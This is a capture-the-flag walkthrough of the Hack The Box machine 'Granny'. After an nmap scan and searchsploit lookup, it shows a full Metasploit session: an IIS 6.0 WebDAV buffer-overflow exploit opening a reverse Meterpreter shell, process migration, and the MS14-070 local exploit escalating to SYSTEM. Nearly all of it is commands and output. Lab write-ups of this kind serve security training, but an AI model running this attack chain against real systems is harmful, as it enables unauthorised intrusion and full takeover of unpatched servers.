Granny
Introduction:
The “granny” is a windows box and very similar to the “grandpa” box in terms of the exploits and privesc. You will be exploiting an IIS CVE to gain initial access to the machine, then migrate your process and use one of the many possible exploits to do a privilege escalation.
Recon
NMAP scan
1nmap -sS -sC -sV -O -oN nmap.granny.txt 10.10.10.15
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 13:59 EST
3Nmap scan report for 10.10.10.15
4Host is up (0.013s latency).
5Not shown: 999 filtered ports
6PORT STATE SERVICE VERSION
780/tcp open http Microsoft IIS httpd 6.0
8| http-methods:
9|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
10|_http-server-header: Microsoft-IIS/6.0
11|_http-title: Under Construction
12| http-webdav-scan:
13| Server Type: Microsoft-IIS/6.0
14| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
15| WebDAV type: Unknown
16| Server Date: Thu, 31 Dec 2020 19:07:33 GMT
17|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
18Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
19Device type: general purpose
20Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
21OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
22Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows XP SP2 or SP3 (85%)
23No exact OS matches for host (test conditions non-ideal).
24Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
25
26OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
27Nmap done: 1 IP address (1 host up) scanned in 17.43 seconds
28
Enumeration
Search for the possible vulnerabilities
1# searchsploit webdav | grep -i iis | grep remote
2Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow | windows/remote/1.c
3Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit) | windows/remote/41992.rb
4Microsoft IIS - WebDAV Write Access Code Execution (Metasploit) | windows/remote/16471.rb
5Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf | windows/remote/22365.pl
6Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf | windows/remote/22366.c
7Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf | windows/remote/22367.txt
8Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf | windows/remote/22368.txt
9Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit) | windows/remote/16470.rb
10Microsoft IIS 5.0 - WebDAV Remote | windows/remote/2.c
11Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav) | windows/remote/51.c
12Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure | windows/remote/26230.txt
13Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
14Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
15Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
16Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
17Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | windows/remote/8765.php
18
Exploit
Metasploit
1msf6 > use windows/iis/iis_webdav_scstoragepathfromurl
2[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
3msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
4
5Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
6
7 Name Current Setting Required Description
8 ---- --------------- -------- -----------
9 MAXPATHLENGTH 60 yes End of physical path brute force
10 MINPATHLENGTH 3 yes Start of physical path brute force
11 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
12 RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
13 RPORT 80 yes The target port (TCP)
14 SSL false no Negotiate SSL/TLS for outgoing connections
15 TARGETURI / yes Path of IIS 6 web application
16 VHOST no HTTP server virtual host
17
18
19Payload options (windows/meterpreter/reverse_tcp):
20
21 Name Current Setting Required Description
22 ---- --------------- -------- -----------
23 EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
24 LHOST 10.0.0.8 yes The listen address (an interface may be specified)
25 LPORT 4444 yes The listen port
26
27
28Exploit target:
29
30 Id Name
31 -- ----
32 0 Microsoft Windows Server 2003 R2 SP2 x86
33
34
35msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set target 0
36target => 0
37msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
38RHOSTS => 10.10.10.15
39msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost tun0
40lhost => tun0
41msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
42
43[*] Started reverse TCP handler on 10.10.14.25:4444
44[*] Trying path length 3 to 60 ...
45[*] Sending stage (175174 bytes) to 10.10.10.15
46[*] Meterpreter session 1 opened (10.10.14.25:4444 -> 10.10.10.15:1032) at 2020-12-31 14:03:30 -0500
meterpreter >
Post-exploit
Process migration
1meterpreter > ps
2
3Process List
4============
5
6 PID PPID Name Arch Session User Path
7 --- ---- ---- ---- ------- ---- ----
8 0 0 [System Process]
9 4 0 System
10 196 1076 cidaemon.exe
11 232 1076 cidaemon.exe
12 276 4 smss.exe
13 324 276 csrss.exe
14 348 276 winlogon.exe
15 396 348 services.exe
16 408 348 lsass.exe
17 616 396 svchost.exe
18 680 396 svchost.exe
19 740 396 svchost.exe
20 772 396 svchost.exe
21 800 396 svchost.exe
22 936 396 spoolsv.exe
23 964 396 msdtc.exe
24 1076 396 cisvc.exe
25 1124 396 svchost.exe
26 1180 396 inetinfo.exe
27 1216 396 svchost.exe
28 1332 396 VGAuthService.exe
29 1424 396 vmtoolsd.exe
30 1476 396 svchost.exe
31 1620 396 svchost.exe
32 1752 396 alg.exe
33 1824 616 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
34 1916 396 dllhost.exe
35 2268 348 logon.scr
36 2316 616 wmiprvse.exe
37 2552 1476 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
38 2752 616 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
39 3404 800 HelpSvc.exe
40 3592 2552 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
41 4064 1076 cidaemon.exe
42
1meterpreter > migrate 1824
2[*] Migrating from 3592 to 1824...
3[*] Migration completed successfully.
Exploit Suggester
meterpreter > sysinfo Computer : GRANNY OS : Windows .NET Server (5.2 Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Domain : HTB Logged On Users : 2 Meterpreter : x86/windows meterpreter > background [*] Backgrounding session 1… msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggster [-] No results from search msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester
Matching Modules
Name Disclosure Date Rank Check Description
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
1msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
2msf6 post(multi/recon/local_exploit_suggester) > sessions -l
3
4Active sessions
5===============
6
7 Id Name Type Information Connection
8 -- ---- ---- ----------- ----------
9 1 meterpreter x86/windows NT AUTHORITY\NETWORK SERVICE @ GRANNY 10.10.14.25:4444 -> 10.10.10.15:1032 (10.10.10.15)
10
11msf6 post(multi/recon/local_exploit_suggester) > show options
12
13Module options (post/multi/recon/local_exploit_suggester):
14
15 Name Current Setting Required Description
16 ---- --------------- -------- -----------
17 SESSION yes The session to run this module on
18 SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
19
20msf6 post(multi/recon/local_exploit_suggester) > set session 1
21session => 1
22msf6 post(multi/recon/local_exploit_suggester) > run
23
24[*] 10.10.10.15 - Collecting local exploits for x86/windows...
25[*] 10.10.10.15 - 35 exploit checks are being tried...
26nil versions are discouraged and will be deprecated in Rubygems 4
27[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
28[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
29[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
30[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
31[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
32[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
33[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
34[*] Post module execution completed
35msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
36[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
37msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options
38
39Module options (exploit/windows/local/ms14_070_tcpip_ioctl):
40
41 Name Current Setting Required Description
42 ---- --------------- -------- -----------
43 SESSION yes The session to run this module on.
44
45
46Payload options (windows/meterpreter/reverse_tcp):
47
48 Name Current Setting Required Description
49 ---- --------------- -------- -----------
50 EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
51 LHOST 10.0.0.8 yes The listen address (an interface may be specified)
52 LPORT 4444 yes The listen port
53
54
55Exploit target:
56
57 Id Name
58 -- ----
59 0 Windows Server 2003 SP2
60
61
62msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost tun0
63lhost => tun0
64msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lport 4455
65lport => 4455
66msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set target 0
67target => 0
68msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
69session => 1
70msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
71
72[*] Started reverse TCP handler on 10.10.14.25:4455
73[*] Storing the shellcode in memory...
74[*] Triggering the vulnerability...
75[*] Checking privileges after exploitation...
76[+] Exploitation successful!
77[*] Sending stage (175174 bytes) to 10.10.10.15
78[*] Meterpreter session 2 opened (10.10.14.25:4455 -> 10.10.10.15:1035) at 2020-12-31 14:08:46 -0500
79
80meterpreter > shell
81Process 3272 created.
82Channel 1 created.
83Microsoft Windows [Version 5.2.3790]
84(C) Copyright 1985-2003 Microsoft Corp.
85
86C:\WINDOWS\system32>getuid
87getuid
88'getuid' is not recognized as an internal or external command,
89operable program or batch file.
90
91C:\WINDOWS\system32>whoami
92whoami
93nt authority\system
Extract user and root flags
root flag
1C:\>dir
2dir
3 Volume in drive C has no label.
4 Volume Serial Number is 246C-D7FE
5
6 Directory of C:\
7
804/12/2017 04:27 PM <DIR> ADFS
904/12/2017 04:04 PM 0 AUTOEXEC.BAT
1004/12/2017 04:04 PM 0 CONFIG.SYS
1104/12/2017 09:19 PM <DIR> Documents and Settings
1204/12/2017 04:17 PM <DIR> FPSE_search
1304/12/2017 04:17 PM <DIR> Inetpub
1412/24/2017 07:21 PM <DIR> Program Files
1512/24/2017 07:30 PM <DIR> WINDOWS
1604/12/2017 04:05 PM <DIR> wmpub
17 2 File(s) 0 bytes
18 7 Dir(s) 18,092,761,088 bytes free
1C:\>cd Documents and Settings
2cd Documents and Settings
3
4C:\Documents and Settings>dir
5dir
6 Volume in drive C has no label.
7 Volume Serial Number is 246C-D7FE
8
9 Directory of C:\Documents and Settings
10
1104/12/2017 09:19 PM <DIR> .
1204/12/2017 09:19 PM <DIR> ..
1304/12/2017 08:48 PM <DIR> Administrator
1404/12/2017 04:03 PM <DIR> All Users
1504/12/2017 09:19 PM <DIR> Lakis
16 0 File(s) 0 bytes
17 5 Dir(s) 18,092,756,992 bytes free
18
19C:\Documents and Settings>cd Administrator
20cd Administrator
21
22C:\Documents and Settings\Administrator>cd Desktop
23cd Desktop
1C:\Documents and Settings\Administrator\Desktop>type root.txt
2type root.txt
3aaXXXXXXXXXXXXXXXXXXXXXXXXXXX6e9
4
1(C) Copyright 1985-2003 Microsoft Corp.
2
3C:\>dir
4dir
5 Volume in drive C has no label.
6 Volume Serial Number is 246C-D7FE
7
8 Directory of C:\
9
1004/12/2017 04:27 PM <DIR> ADFS
1104/12/2017 04:04 PM 0 AUTOEXEC.BAT
1204/12/2017 04:04 PM 0 CONFIG.SYS
1304/12/2017 09:19 PM <DIR> Documents and Settings
1404/12/2017 04:17 PM <DIR> FPSE_search
1504/12/2017 04:17 PM <DIR> Inetpub
1612/24/2017 07:21 PM <DIR> Program Files
1712/24/2017 07:30 PM <DIR> WINDOWS
1804/12/2017 04:05 PM <DIR> wmpub
19 2 File(s) 0 bytes
20 7 Dir(s) 18,092,752,896 bytes free
21
22C:\>cd Documents and Settings
23cd Documents and Settings
1C:\Documents and Settings>dir
2dir
3 Volume in drive C has no label.
4 Volume Serial Number is 246C-D7FE
5
6 Directory of C:\Documents and Settings
7
804/12/2017 09:19 PM <DIR> .
904/12/2017 09:19 PM <DIR> ..
1004/12/2017 08:48 PM <DIR> Administrator
1104/12/2017 04:03 PM <DIR> All Users
1204/12/2017 09:19 PM <DIR> Lakis
13 0 File(s) 0 bytes
14 5 Dir(s) 18,092,752,896 bytes free
15
16C:\Documents and Settings>cd Lakis\Desktop
17cd Lakis\Desktop
18
19C:\Documents and Settings\Lakis\Desktop>type user.txt
20type user.txt
2170XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd1
22C:\Documents and Settings\Lakis\Desktop>meterpreter >
Notes: None